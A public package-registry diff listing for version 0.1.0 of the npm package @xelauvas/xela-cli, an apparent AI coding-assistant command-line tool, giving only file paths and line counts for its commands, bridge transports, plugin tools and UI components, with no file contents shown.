@xelauvas/xela-cli 0.1.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/README.md +200 -0
- package/bin/xela +100 -0
- package/package.json +88 -0
- package/src/QueryEngine.ts +1295 -0
- package/src/Task.ts +125 -0
- package/src/Tool.ts +792 -0
- package/src/_shims/_generated_stubs/_universal_stub.mjs +168 -0
- package/src/_shims/_generated_stubs/text_stub.mjs +1 -0
- package/src/_shims/bun_bundle.js +9 -0
- package/src/_shims/cjs_stub.cjs +23 -0
- package/src/_shims/empty_stub.js +33 -0
- package/src/_shims/loader.js +352 -0
- package/src/_shims/openai_adapter.ts +486 -0
- package/src/_shims/react_compiler_runtime.js +17 -0
- package/src/_shims/register.js +148 -0
- package/src/assistant/sessionHistory.ts +87 -0
- package/src/bootstrap/state.ts +1759 -0
- package/src/bridge/bridgeApi.ts +539 -0
- package/src/bridge/bridgeConfig.ts +48 -0
- package/src/bridge/bridgeDebug.ts +135 -0
- package/src/bridge/bridgeEnabled.ts +202 -0
- package/src/bridge/bridgeMain.ts +2999 -0
- package/src/bridge/bridgeMessaging.ts +461 -0
- package/src/bridge/bridgePermissionCallbacks.ts +43 -0
- package/src/bridge/bridgePointer.ts +210 -0
- package/src/bridge/bridgeStatusUtil.ts +163 -0
- package/src/bridge/bridgeUI.ts +530 -0
- package/src/bridge/capacityWake.ts +56 -0
- package/src/bridge/codeSessionApi.ts +168 -0
- package/src/bridge/createSession.ts +384 -0
- package/src/bridge/debugUtils.ts +141 -0
- package/src/bridge/envLessBridgeConfig.ts +165 -0
- package/src/bridge/flushGate.ts +71 -0
- package/src/bridge/inboundAttachments.ts +175 -0
- package/src/bridge/inboundMessages.ts +80 -0
- package/src/bridge/initReplBridge.ts +569 -0
- package/src/bridge/jwtUtils.ts +256 -0
- package/src/bridge/pollConfig.ts +110 -0
- package/src/bridge/pollConfigDefaults.ts +82 -0
- package/src/bridge/remoteBridgeCore.ts +1008 -0
- package/src/bridge/replBridge.ts +2406 -0
- package/src/bridge/replBridgeHandle.ts +36 -0
- package/src/bridge/replBridgeTransport.ts +370 -0
- package/src/bridge/sessionIdCompat.ts +57 -0
- package/src/bridge/sessionRunner.ts +550 -0
- package/src/bridge/trustedDevice.ts +210 -0
- package/src/bridge/types.ts +262 -0
- package/src/bridge/workSecret.ts +127 -0
- package/src/buddy/CompanionSprite.tsx +371 -0
- package/src/buddy/companion.ts +133 -0
- package/src/buddy/prompt.ts +36 -0
- package/src/buddy/sprites.ts +514 -0
- package/src/buddy/types.ts +148 -0
- package/src/buddy/useBuddyNotification.tsx +98 -0
- package/src/cli/exit.ts +31 -0
- package/src/cli/handlers/agents.ts +70 -0
- package/src/cli/handlers/auth.ts +330 -0
- package/src/cli/handlers/autoMode.ts +170 -0
- package/src/cli/handlers/mcp.tsx +362 -0
- package/src/cli/handlers/plugins.ts +878 -0
- package/src/cli/handlers/util.tsx +110 -0
- package/src/cli/ndjsonSafeStringify.ts +32 -0
- package/src/cli/print.ts +5594 -0
- package/src/cli/remoteIO.ts +255 -0
- package/src/cli/structuredIO.ts +859 -0
- package/src/cli/transports/HybridTransport.ts +282 -0
- package/src/cli/transports/SSETransport.ts +711 -0
- package/src/cli/transports/SerialBatchEventUploader.ts +275 -0
- package/src/cli/transports/WebSocketTransport.ts +800 -0
- package/src/cli/transports/WorkerStateUploader.ts +131 -0
- package/src/cli/transports/ccrClient.ts +998 -0
- package/src/cli/transports/transportUtils.ts +45 -0
- package/src/cli/update.ts +422 -0
- package/src/commands/add-dir/add-dir.tsx +126 -0
- package/src/commands/add-dir/index.ts +11 -0
- package/src/commands/add-dir/validation.ts +110 -0
- package/src/commands/advisor.ts +109 -0
- package/src/commands/agents/agents.tsx +12 -0
- package/src/commands/agents/index.ts +10 -0
- package/src/commands/ant-trace/index.js +1 -0
- package/src/commands/autofix-pr/index.js +1 -0
- package/src/commands/backfill-sessions/index.js +1 -0
- package/src/commands/branch/branch.ts +296 -0
- package/src/commands/branch/index.ts +14 -0
- package/src/commands/break-cache/index.js +1 -0
- package/src/commands/bridge/bridge.tsx +509 -0
- package/src/commands/bridge/index.ts +26 -0
- package/src/commands/bridge-kick.ts +200 -0
- package/src/commands/brief.ts +130 -0
- package/src/commands/btw/btw.tsx +243 -0
- package/src/commands/btw/index.ts +13 -0
- package/src/commands/bughunter/index.js +1 -0
- package/src/commands/chrome/chrome.tsx +285 -0
- package/src/commands/chrome/index.ts +13 -0
- package/src/commands/clear/caches.ts +144 -0
- package/src/commands/clear/clear.ts +7 -0
- package/src/commands/clear/conversation.ts +251 -0
- package/src/commands/clear/index.ts +19 -0
- package/src/commands/color/color.ts +93 -0
- package/src/commands/color/index.ts +16 -0
- package/src/commands/commit-push-pr.ts +158 -0
- package/src/commands/commit.ts +92 -0
- package/src/commands/compact/compact.ts +287 -0
- package/src/commands/compact/index.ts +15 -0
- package/src/commands/config/config.tsx +7 -0
- package/src/commands/config/index.ts +11 -0
- package/src/commands/context/context-noninteractive.ts +325 -0
- package/src/commands/context/context.tsx +64 -0
- package/src/commands/context/index.ts +24 -0
- package/src/commands/copy/copy.tsx +371 -0
- package/src/commands/copy/index.ts +15 -0
- package/src/commands/cost/cost.ts +24 -0
- package/src/commands/cost/index.ts +23 -0
- package/src/commands/createMovedToPluginCommand.ts +65 -0
- package/src/commands/ctx_viz/index.js +1 -0
- package/src/commands/debug-tool-call/index.js +1 -0
- package/src/commands/desktop/desktop.tsx +9 -0
- package/src/commands/desktop/index.ts +26 -0
- package/src/commands/diff/diff.tsx +9 -0
- package/src/commands/diff/index.ts +8 -0
- package/src/commands/doctor/doctor.tsx +7 -0
- package/src/commands/doctor/index.ts +12 -0
- package/src/commands/effort/effort.tsx +183 -0
- package/src/commands/effort/index.ts +13 -0
- package/src/commands/env/index.js +1 -0
- package/src/commands/exit/exit.tsx +33 -0
- package/src/commands/exit/index.ts +12 -0
- package/src/commands/export/export.tsx +91 -0
- package/src/commands/export/index.ts +11 -0
- package/src/commands/extra-usage/extra-usage-core.ts +118 -0
- package/src/commands/extra-usage/extra-usage-noninteractive.ts +16 -0
- package/src/commands/extra-usage/extra-usage.tsx +17 -0
- package/src/commands/extra-usage/index.ts +31 -0
- package/src/commands/fast/fast.tsx +269 -0
- package/src/commands/fast/index.ts +26 -0
- package/src/commands/feedback/feedback.tsx +25 -0
- package/src/commands/feedback/index.ts +26 -0
- package/src/commands/files/files.ts +19 -0
- package/src/commands/files/index.ts +12 -0
- package/src/commands/good-claude/index.js +1 -0
- package/src/commands/heapdump/heapdump.ts +17 -0
- package/src/commands/heapdump/index.ts +12 -0
- package/src/commands/help/help.tsx +11 -0
- package/src/commands/help/index.ts +10 -0
- package/src/commands/hooks/hooks.tsx +13 -0
- package/src/commands/hooks/index.ts +11 -0
- package/src/commands/ide/ide.tsx +646 -0
- package/src/commands/ide/index.ts +11 -0
- package/src/commands/init-verifiers.ts +262 -0
- package/src/commands/init.ts +256 -0
- package/src/commands/insights.ts +3200 -0
- package/src/commands/install-github-app/ApiKeyStep.tsx +231 -0
- package/src/commands/install-github-app/CheckExistingSecretStep.tsx +190 -0
- package/src/commands/install-github-app/CheckGitHubStep.tsx +15 -0
- package/src/commands/install-github-app/ChooseRepoStep.tsx +211 -0
- package/src/commands/install-github-app/CreatingStep.tsx +65 -0
- package/src/commands/install-github-app/ErrorStep.tsx +85 -0
- package/src/commands/install-github-app/ExistingWorkflowStep.tsx +103 -0
- package/src/commands/install-github-app/InstallAppStep.tsx +94 -0
- package/src/commands/install-github-app/OAuthFlowStep.tsx +276 -0
- package/src/commands/install-github-app/SuccessStep.tsx +96 -0
- package/src/commands/install-github-app/WarningsStep.tsx +73 -0
- package/src/commands/install-github-app/index.ts +13 -0
- package/src/commands/install-github-app/install-github-app.tsx +587 -0
- package/src/commands/install-github-app/setupGitHubActions.ts +325 -0
- package/src/commands/install-slack-app/index.ts +12 -0
- package/src/commands/install-slack-app/install-slack-app.ts +30 -0
- package/src/commands/install.tsx +300 -0
- package/src/commands/issue/index.js +1 -0
- package/src/commands/keybindings/index.ts +13 -0
- package/src/commands/keybindings/keybindings.ts +53 -0
- package/src/commands/login/index.ts +14 -0
- package/src/commands/login/login.tsx +104 -0
- package/src/commands/logout/index.ts +10 -0
- package/src/commands/logout/logout.tsx +82 -0
- package/src/commands/mcp/addCommand.ts +280 -0
- package/src/commands/mcp/index.ts +12 -0
- package/src/commands/mcp/mcp.tsx +85 -0
- package/src/commands/mcp/xaaIdpCommand.ts +266 -0
- package/src/commands/memory/index.ts +10 -0
- package/src/commands/memory/memory.tsx +90 -0
- package/src/commands/mobile/index.ts +11 -0
- package/src/commands/mobile/mobile.tsx +274 -0
- package/src/commands/mock-limits/index.js +1 -0
- package/src/commands/model/index.ts +16 -0
- package/src/commands/model/model.tsx +297 -0
- package/src/commands/oauth-refresh/index.js +1 -0
- package/src/commands/onboarding/index.js +1 -0
- package/src/commands/output-style/index.ts +11 -0
- package/src/commands/output-style/output-style.tsx +7 -0
- package/src/commands/passes/index.ts +22 -0
- package/src/commands/passes/passes.tsx +24 -0
- package/src/commands/perf-issue/index.js +1 -0
- package/src/commands/permissions/index.ts +11 -0
- package/src/commands/permissions/permissions.tsx +10 -0
- package/src/commands/plan/index.ts +11 -0
- package/src/commands/plan/plan.tsx +122 -0
- package/src/commands/plugin/AddMarketplace.tsx +162 -0
- package/src/commands/plugin/BrowseMarketplace.tsx +802 -0
- package/src/commands/plugin/DiscoverPlugins.tsx +781 -0
- package/src/commands/plugin/ManageMarketplaces.tsx +838 -0
- package/src/commands/plugin/ManagePlugins.tsx +2215 -0
- package/src/commands/plugin/PluginErrors.tsx +124 -0
- package/src/commands/plugin/PluginOptionsDialog.tsx +357 -0
- package/src/commands/plugin/PluginOptionsFlow.tsx +135 -0
- package/src/commands/plugin/PluginSettings.tsx +1072 -0
- package/src/commands/plugin/PluginTrustWarning.tsx +32 -0
- package/src/commands/plugin/UnifiedInstalledCell.tsx +565 -0
- package/src/commands/plugin/ValidatePlugin.tsx +98 -0
- package/src/commands/plugin/index.tsx +11 -0
- package/src/commands/plugin/parseArgs.ts +103 -0
- package/src/commands/plugin/plugin.tsx +7 -0
- package/src/commands/plugin/pluginDetailsHelpers.tsx +117 -0
- package/src/commands/plugin/usePagination.ts +171 -0
- package/src/commands/pr_comments/index.ts +50 -0
- package/src/commands/privacy-settings/index.ts +14 -0
- package/src/commands/privacy-settings/privacy-settings.tsx +58 -0
- package/src/commands/rate-limit-options/index.ts +19 -0
- package/src/commands/rate-limit-options/rate-limit-options.tsx +210 -0
- package/src/commands/release-notes/index.ts +11 -0
- package/src/commands/release-notes/release-notes.ts +50 -0
- package/src/commands/reload-plugins/index.ts +18 -0
- package/src/commands/reload-plugins/reload-plugins.ts +61 -0
- package/src/commands/remote-env/index.ts +15 -0
- package/src/commands/remote-env/remote-env.tsx +7 -0
- package/src/commands/remote-setup/api.ts +182 -0
- package/src/commands/remote-setup/index.ts +20 -0
- package/src/commands/remote-setup/remote-setup.tsx +187 -0
- package/src/commands/rename/generateSessionName.ts +67 -0
- package/src/commands/rename/index.ts +12 -0
- package/src/commands/rename/rename.ts +87 -0
- package/src/commands/reset-limits/index.js +4 -0
- package/src/commands/resume/index.ts +12 -0
- package/src/commands/resume/resume.tsx +275 -0
- package/src/commands/review/UltrareviewOverageDialog.tsx +96 -0
- package/src/commands/review/reviewRemote.ts +316 -0
- package/src/commands/review/ultrareviewCommand.tsx +58 -0
- package/src/commands/review/ultrareviewEnabled.ts +14 -0
- package/src/commands/review.ts +57 -0
- package/src/commands/rewind/index.ts +13 -0
- package/src/commands/rewind/rewind.ts +13 -0
- package/src/commands/sandbox-toggle/index.ts +50 -0
- package/src/commands/sandbox-toggle/sandbox-toggle.tsx +83 -0
- package/src/commands/security-review.ts +243 -0
- package/src/commands/session/index.ts +16 -0
- package/src/commands/session/session.tsx +140 -0
- package/src/commands/share/index.js +1 -0
- package/src/commands/skills/index.ts +10 -0
- package/src/commands/skills/skills.tsx +8 -0
- package/src/commands/stats/index.ts +10 -0
- package/src/commands/stats/stats.tsx +7 -0
- package/src/commands/status/index.ts +12 -0
- package/src/commands/status/status.tsx +8 -0
- package/src/commands/statusline.tsx +24 -0
- package/src/commands/stickers/index.ts +11 -0
- package/src/commands/stickers/stickers.ts +16 -0
- package/src/commands/summary/index.js +1 -0
- package/src/commands/tag/index.ts +12 -0
- package/src/commands/tag/tag.tsx +215 -0
- package/src/commands/tasks/index.ts +11 -0
- package/src/commands/tasks/tasks.tsx +8 -0
- package/src/commands/teleport/index.js +1 -0
- package/src/commands/terminalSetup/index.ts +23 -0
- package/src/commands/terminalSetup/terminalSetup.tsx +531 -0
- package/src/commands/theme/index.ts +10 -0
- package/src/commands/theme/theme.tsx +57 -0
- package/src/commands/thinkback/index.ts +13 -0
- package/src/commands/thinkback/thinkback.tsx +554 -0
- package/src/commands/thinkback-play/index.ts +17 -0
- package/src/commands/thinkback-play/thinkback-play.ts +43 -0
- package/src/commands/ultraplan.tsx +471 -0
- package/src/commands/upgrade/index.ts +16 -0
- package/src/commands/upgrade/upgrade.tsx +38 -0
- package/src/commands/usage/index.ts +9 -0
- package/src/commands/usage/usage.tsx +7 -0
- package/src/commands/version.ts +22 -0
- package/src/commands/vim/index.ts +11 -0
- package/src/commands/vim/vim.ts +38 -0
- package/src/commands/voice/index.ts +20 -0
- package/src/commands/voice/voice.ts +150 -0
- package/src/commands.ts +754 -0
- package/src/components/AgentProgressLine.tsx +136 -0
- package/src/components/App.tsx +56 -0
- package/src/components/ApproveApiKey.tsx +123 -0
- package/src/components/AutoModeOptInDialog.tsx +142 -0
- package/src/components/AutoUpdater.tsx +198 -0
- package/src/components/AutoUpdaterWrapper.tsx +91 -0
- package/src/components/AwsAuthStatusBox.tsx +82 -0
- package/src/components/BaseTextInput.tsx +136 -0
- package/src/components/BashModeProgress.tsx +56 -0
- package/src/components/BridgeDialog.tsx +401 -0
- package/src/components/BypassPermissionsModeDialog.tsx +87 -0
- package/src/components/ChannelDowngradeDialog.tsx +102 -0
- package/src/components/ClaudeCodeHint/PluginHintMenu.tsx +78 -0
- package/src/components/ClaudeInChromeOnboarding.tsx +121 -0
- package/src/components/ClaudeMdExternalIncludesDialog.tsx +137 -0
- package/src/components/ClickableImageRef.tsx +73 -0
- package/src/components/CompactSummary.tsx +118 -0
- package/src/components/ConfigurableShortcutHint.tsx +57 -0
- package/src/components/ConsoleOAuthFlow.tsx +631 -0
- package/src/components/ContextSuggestions.tsx +47 -0
- package/src/components/ContextVisualization.tsx +489 -0
- package/src/components/CoordinatorAgentStatus.tsx +273 -0
- package/src/components/CostThresholdDialog.tsx +50 -0
- package/src/components/CtrlOToExpand.tsx +51 -0
- package/src/components/CustomSelect/SelectMulti.tsx +213 -0
- package/src/components/CustomSelect/index.ts +3 -0
- package/src/components/CustomSelect/option-map.ts +50 -0
- package/src/components/CustomSelect/select-input-option.tsx +488 -0
- package/src/components/CustomSelect/select-option.tsx +68 -0
- package/src/components/CustomSelect/select.tsx +690 -0
- package/src/components/CustomSelect/use-multi-select-state.ts +414 -0
- package/src/components/CustomSelect/use-select-input.ts +287 -0
- package/src/components/CustomSelect/use-select-navigation.ts +653 -0
- package/src/components/CustomSelect/use-select-state.ts +157 -0
- package/src/components/DesktopHandoff.tsx +193 -0
- package/src/components/DesktopUpsell/DesktopUpsellStartup.tsx +171 -0
- package/src/components/DevBar.tsx +49 -0
- package/src/components/DevChannelsDialog.tsx +105 -0
- package/src/components/DiagnosticsDisplay.tsx +95 -0
- package/src/components/EffortCallout.tsx +265 -0
- package/src/components/EffortIndicator.ts +42 -0
- package/src/components/ExitFlow.tsx +48 -0
- package/src/components/ExportDialog.tsx +128 -0
- package/src/components/FallbackToolUseErrorMessage.tsx +116 -0
- package/src/components/FallbackToolUseRejectedMessage.tsx +16 -0
- package/src/components/FastIcon.tsx +46 -0
- package/src/components/Feedback.tsx +592 -0
- package/src/components/FeedbackSurvey/FeedbackSurvey.tsx +174 -0
- package/src/components/FeedbackSurvey/FeedbackSurveyView.tsx +108 -0
- package/src/components/FeedbackSurvey/TranscriptSharePrompt.tsx +88 -0
- package/src/components/FeedbackSurvey/submitTranscriptShare.ts +112 -0
- package/src/components/FeedbackSurvey/useDebouncedDigitInput.ts +82 -0
- package/src/components/FeedbackSurvey/useFeedbackSurvey.tsx +296 -0
- package/src/components/FeedbackSurvey/useMemorySurvey.tsx +213 -0
- package/src/components/FeedbackSurvey/usePostCompactSurvey.tsx +206 -0
- package/src/components/FeedbackSurvey/useSurveyState.tsx +100 -0
- package/src/components/FileEditToolDiff.tsx +181 -0
- package/src/components/FileEditToolUpdatedMessage.tsx +124 -0
- package/src/components/FileEditToolUseRejectedMessage.tsx +170 -0
- package/src/components/FilePathLink.tsx +43 -0
- package/src/components/FullscreenLayout.tsx +637 -0
- package/src/components/GlobalSearchDialog.tsx +343 -0
- package/src/components/HelpV2/Commands.tsx +82 -0
- package/src/components/HelpV2/General.tsx +23 -0
- package/src/components/HelpV2/HelpV2.tsx +184 -0
- package/src/components/HighlightedCode/Fallback.tsx +193 -0
- package/src/components/HighlightedCode.tsx +190 -0
- package/src/components/HistorySearchDialog.tsx +118 -0
- package/src/components/IdeAutoConnectDialog.tsx +154 -0
- package/src/components/IdeOnboardingDialog.tsx +167 -0
- package/src/components/IdeStatusIndicator.tsx +58 -0
- package/src/components/IdleReturnDialog.tsx +118 -0
- package/src/components/InterruptedByUser.tsx +15 -0
- package/src/components/InvalidConfigDialog.tsx +156 -0
- package/src/components/InvalidSettingsDialog.tsx +89 -0
- package/src/components/KeybindingWarnings.tsx +55 -0
- package/src/components/LanguagePicker.tsx +86 -0
- package/src/components/LogSelector.tsx +1575 -0
- package/src/components/LogoV2/AnimatedAsterisk.tsx +50 -0
- package/src/components/LogoV2/AnimatedClawd.tsx +124 -0
- package/src/components/LogoV2/ChannelsNotice.tsx +266 -0
- package/src/components/LogoV2/Clawd.tsx +240 -0
- package/src/components/LogoV2/CondensedLogo.tsx +161 -0
- package/src/components/LogoV2/EmergencyTip.tsx +58 -0
- package/src/components/LogoV2/Feed.tsx +112 -0
- package/src/components/LogoV2/FeedColumn.tsx +59 -0
- package/src/components/LogoV2/GuestPassesUpsell.tsx +70 -0
- package/src/components/LogoV2/LogoV2.tsx +543 -0
- package/src/components/LogoV2/Opus1mMergeNotice.tsx +55 -0
- package/src/components/LogoV2/OverageCreditUpsell.tsx +166 -0
- package/src/components/LogoV2/VoiceModeNotice.tsx +68 -0
- package/src/components/LogoV2/WelcomeV2.tsx +433 -0
- package/src/components/LogoV2/feedConfigs.tsx +92 -0
- package/src/components/LspRecommendation/LspRecommendationMenu.tsx +88 -0
- package/src/components/MCPServerApprovalDialog.tsx +115 -0
- package/src/components/MCPServerDesktopImportDialog.tsx +203 -0
- package/src/components/MCPServerDialogCopy.tsx +15 -0
- package/src/components/MCPServerMultiselectDialog.tsx +133 -0
- package/src/components/ManagedSettingsSecurityDialog/ManagedSettingsSecurityDialog.tsx +149 -0
- package/src/components/ManagedSettingsSecurityDialog/utils.ts +144 -0
- package/src/components/Markdown.tsx +236 -0
- package/src/components/MarkdownTable.tsx +322 -0
- package/src/components/MemoryUsageIndicator.tsx +37 -0
- package/src/components/Message.tsx +627 -0
- package/src/components/MessageModel.tsx +43 -0
- package/src/components/MessageResponse.tsx +78 -0
- package/src/components/MessageRow.tsx +383 -0
- package/src/components/MessageSelector.tsx +831 -0
- package/src/components/MessageTimestamp.tsx +63 -0
- package/src/components/Messages.tsx +834 -0
- package/src/components/ModelPicker.tsx +448 -0
- package/src/components/NativeAutoUpdater.tsx +193 -0
- package/src/components/NotebookEditToolUseRejectedMessage.tsx +92 -0
- package/src/components/OffscreenFreeze.tsx +44 -0
- package/src/components/Onboarding.tsx +244 -0
- package/src/components/OutputStylePicker.tsx +112 -0
- package/src/components/PackageManagerAutoUpdater.tsx +104 -0
- package/src/components/Passes/Passes.tsx +184 -0
- package/src/components/PrBadge.tsx +97 -0
- package/src/components/PressEnterToContinue.tsx +15 -0
- package/src/components/PromptInput/HistorySearchInput.tsx +51 -0
- package/src/components/PromptInput/IssueFlagBanner.tsx +12 -0
- package/src/components/PromptInput/Notifications.tsx +332 -0
- package/src/components/PromptInput/PromptInput.tsx +2339 -0
- package/src/components/PromptInput/PromptInputFooter.tsx +191 -0
- package/src/components/PromptInput/PromptInputFooterLeftSide.tsx +517 -0
- package/src/components/PromptInput/PromptInputFooterSuggestions.tsx +293 -0
- package/src/components/PromptInput/PromptInputHelpMenu.tsx +358 -0
- package/src/components/PromptInput/PromptInputModeIndicator.tsx +93 -0
- package/src/components/PromptInput/PromptInputQueuedCommands.tsx +117 -0
- package/src/components/PromptInput/PromptInputStashNotice.tsx +25 -0
- package/src/components/PromptInput/SandboxPromptFooterHint.tsx +64 -0
- package/src/components/PromptInput/ShimmeredInput.tsx +143 -0
- package/src/components/PromptInput/VoiceIndicator.tsx +137 -0
- package/src/components/PromptInput/inputModes.ts +33 -0
- package/src/components/PromptInput/inputPaste.ts +90 -0
- package/src/components/PromptInput/useMaybeTruncateInput.ts +58 -0
- package/src/components/PromptInput/usePromptInputPlaceholder.ts +76 -0
- package/src/components/PromptInput/useShowFastIconHint.ts +31 -0
- package/src/components/PromptInput/useSwarmBanner.ts +155 -0
- package/src/components/PromptInput/utils.ts +60 -0
- package/src/components/QuickOpenDialog.tsx +244 -0
- package/src/components/RemoteCallout.tsx +76 -0
- package/src/components/RemoteEnvironmentDialog.tsx +340 -0
- package/src/components/ResumeTask.tsx +268 -0
- package/src/components/SandboxViolationExpandedView.tsx +99 -0
- package/src/components/ScrollKeybindingHandler.tsx +1012 -0
- package/src/components/SearchBox.tsx +72 -0
- package/src/components/SentryErrorBoundary.ts +28 -0
- package/src/components/SessionBackgroundHint.tsx +108 -0
- package/src/components/SessionPreview.tsx +194 -0
- package/src/components/Settings/Config.tsx +1822 -0
- package/src/components/Settings/Settings.tsx +137 -0
- package/src/components/Settings/Status.tsx +241 -0
- package/src/components/Settings/Usage.tsx +377 -0
- package/src/components/ShowInIDEPrompt.tsx +170 -0
- package/src/components/SkillImprovementSurvey.tsx +152 -0
- package/src/components/Spinner/FlashingChar.tsx +61 -0
- package/src/components/Spinner/GlimmerMessage.tsx +328 -0
- package/src/components/Spinner/ShimmerChar.tsx +36 -0
- package/src/components/Spinner/SpinnerAnimationRow.tsx +265 -0
- package/src/components/Spinner/SpinnerGlyph.tsx +80 -0
- package/src/components/Spinner/TeammateSpinnerLine.tsx +233 -0
- package/src/components/Spinner/TeammateSpinnerTree.tsx +272 -0
- package/src/components/Spinner/index.ts +10 -0
- package/src/components/Spinner/teammateSelectHint.ts +1 -0
- package/src/components/Spinner/useShimmerAnimation.ts +31 -0
- package/src/components/Spinner/useStalledAnimation.ts +75 -0
- package/src/components/Spinner/utils.ts +84 -0
- package/src/components/Spinner.tsx +562 -0
- package/src/components/Stats.tsx +1228 -0
- package/src/components/StatusLine.tsx +324 -0
- package/src/components/StatusNotices.tsx +55 -0
- package/src/components/StructuredDiff/Fallback.tsx +487 -0
- package/src/components/StructuredDiff/colorDiff.ts +37 -0
- package/src/components/StructuredDiff.tsx +190 -0
- package/src/components/StructuredDiffList.tsx +30 -0
- package/src/components/TagTabs.tsx +139 -0
- package/src/components/TaskListV2.tsx +378 -0
- package/src/components/TeammateViewHeader.tsx +82 -0
- package/src/components/TeleportError.tsx +189 -0
- package/src/components/TeleportProgress.tsx +140 -0
- package/src/components/TeleportRepoMismatchDialog.tsx +104 -0
- package/src/components/TeleportResumeWrapper.tsx +167 -0
- package/src/components/TeleportStash.tsx +116 -0
- package/src/components/TextInput.tsx +124 -0
- package/src/components/ThemePicker.tsx +333 -0
- package/src/components/ThinkingToggle.tsx +153 -0
- package/src/components/TokenWarning.tsx +179 -0
- package/src/components/ToolUseLoader.tsx +42 -0
- package/src/components/TrustDialog/TrustDialog.tsx +290 -0
- package/src/components/TrustDialog/utils.ts +245 -0
- package/src/components/ValidationErrorsList.tsx +148 -0
- package/src/components/VimTextInput.tsx +140 -0
- package/src/components/VirtualMessageList.tsx +1082 -0
- package/src/components/WorkflowMultiselectDialog.tsx +128 -0
- package/src/components/WorktreeExitDialog.tsx +231 -0
- package/src/components/agents/AgentDetail.tsx +220 -0
- package/src/components/agents/AgentEditor.tsx +178 -0
- package/src/components/agents/AgentNavigationFooter.tsx +26 -0
- package/src/components/agents/AgentsList.tsx +440 -0
- package/src/components/agents/AgentsMenu.tsx +800 -0
- package/src/components/agents/ColorPicker.tsx +112 -0
- package/src/components/agents/ModelSelector.tsx +68 -0
- package/src/components/agents/ToolSelector.tsx +562 -0
- package/src/components/agents/agentFileUtils.ts +272 -0
- package/src/components/agents/generateAgent.ts +197 -0
- package/src/components/agents/new-agent-creation/CreateAgentWizard.tsx +97 -0
- package/src/components/agents/new-agent-creation/wizard-steps/ColorStep.tsx +84 -0
- package/src/components/agents/new-agent-creation/wizard-steps/ConfirmStep.tsx +378 -0
- package/src/components/agents/new-agent-creation/wizard-steps/ConfirmStepWrapper.tsx +74 -0
- package/src/components/agents/new-agent-creation/wizard-steps/DescriptionStep.tsx +123 -0
- package/src/components/agents/new-agent-creation/wizard-steps/GenerateStep.tsx +143 -0
- package/src/components/agents/new-agent-creation/wizard-steps/LocationStep.tsx +80 -0
- package/src/components/agents/new-agent-creation/wizard-steps/MemoryStep.tsx +113 -0
- package/src/components/agents/new-agent-creation/wizard-steps/MethodStep.tsx +80 -0
- package/src/components/agents/new-agent-creation/wizard-steps/ModelStep.tsx +52 -0
- package/src/components/agents/new-agent-creation/wizard-steps/PromptStep.tsx +128 -0
- package/src/components/agents/new-agent-creation/wizard-steps/ToolsStep.tsx +61 -0
- package/src/components/agents/new-agent-creation/wizard-steps/TypeStep.tsx +103 -0
- package/src/components/agents/types.ts +27 -0
- package/src/components/agents/utils.ts +18 -0
- package/src/components/agents/validateAgent.ts +109 -0
- package/src/components/design-system/Byline.tsx +77 -0
- package/src/components/design-system/Dialog.tsx +138 -0
- package/src/components/design-system/Divider.tsx +149 -0
- package/src/components/design-system/FuzzyPicker.tsx +312 -0
- package/src/components/design-system/KeyboardShortcutHint.tsx +81 -0
- package/src/components/design-system/ListItem.tsx +244 -0
- package/src/components/design-system/LoadingState.tsx +94 -0
- package/src/components/design-system/Pane.tsx +77 -0
- package/src/components/design-system/ProgressBar.tsx +86 -0
- package/src/components/design-system/Ratchet.tsx +80 -0
- package/src/components/design-system/StatusIcon.tsx +95 -0
- package/src/components/design-system/Tabs.tsx +340 -0
- package/src/components/design-system/ThemeProvider.tsx +174 -0
- package/src/components/design-system/ThemedBox.tsx +156 -0
- package/src/components/design-system/ThemedText.tsx +124 -0
- package/src/components/design-system/color.ts +30 -0
- package/src/components/diff/DiffDetailView.tsx +281 -0
- package/src/components/diff/DiffDialog.tsx +383 -0
- package/src/components/diff/DiffFileList.tsx +292 -0
- package/src/components/grove/Grove.tsx +463 -0
- package/src/components/hooks/HooksConfigMenu.tsx +578 -0
- package/src/components/hooks/PromptDialog.tsx +90 -0
- package/src/components/hooks/SelectEventMode.tsx +127 -0
- package/src/components/hooks/SelectHookMode.tsx +112 -0
- package/src/components/hooks/SelectMatcherMode.tsx +144 -0
- package/src/components/hooks/ViewHookMode.tsx +199 -0
- package/src/components/mcp/CapabilitiesSection.tsx +61 -0
- package/src/components/mcp/ElicitationDialog.tsx +1169 -0
- package/src/components/mcp/MCPAgentServerMenu.tsx +183 -0
- package/src/components/mcp/MCPListPanel.tsx +504 -0
- package/src/components/mcp/MCPReconnect.tsx +167 -0
- package/src/components/mcp/MCPRemoteServerMenu.tsx +649 -0
- package/src/components/mcp/MCPSettings.tsx +398 -0
- package/src/components/mcp/MCPStdioServerMenu.tsx +177 -0
- package/src/components/mcp/MCPToolDetailView.tsx +212 -0
- package/src/components/mcp/MCPToolListView.tsx +141 -0
- package/src/components/mcp/McpParsingWarnings.tsx +213 -0
- package/src/components/mcp/index.ts +9 -0
- package/src/components/mcp/utils/reconnectHelpers.tsx +49 -0
- package/src/components/memory/MemoryFileSelector.tsx +438 -0
- package/src/components/memory/MemoryUpdateNotification.tsx +45 -0
- package/src/components/messageActions.tsx +450 -0
- package/src/components/messages/AdvisorMessage.tsx +158 -0
- package/src/components/messages/AssistantRedactedThinkingMessage.tsx +31 -0
- package/src/components/messages/AssistantTextMessage.tsx +270 -0
- package/src/components/messages/AssistantThinkingMessage.tsx +86 -0
- package/src/components/messages/AssistantToolUseMessage.tsx +368 -0
- package/src/components/messages/AttachmentMessage.tsx +536 -0
- package/src/components/messages/CollapsedReadSearchContent.tsx +484 -0
- package/src/components/messages/CompactBoundaryMessage.tsx +18 -0
- package/src/components/messages/GroupedToolUseContent.tsx +58 -0
- package/src/components/messages/HighlightedThinkingText.tsx +162 -0
- package/src/components/messages/HookProgressMessage.tsx +116 -0
- package/src/components/messages/PlanApprovalMessage.tsx +222 -0
- package/src/components/messages/RateLimitMessage.tsx +161 -0
- package/src/components/messages/ShutdownMessage.tsx +132 -0
- package/src/components/messages/SystemAPIErrorMessage.tsx +141 -0
- package/src/components/messages/SystemTextMessage.tsx +827 -0
- package/src/components/messages/TaskAssignmentMessage.tsx +76 -0
- package/src/components/messages/UserAgentNotificationMessage.tsx +83 -0
- package/src/components/messages/UserBashInputMessage.tsx +58 -0
- package/src/components/messages/UserBashOutputMessage.tsx +54 -0
- package/src/components/messages/UserChannelMessage.tsx +137 -0
- package/src/components/messages/UserCommandMessage.tsx +108 -0
- package/src/components/messages/UserImageMessage.tsx +59 -0
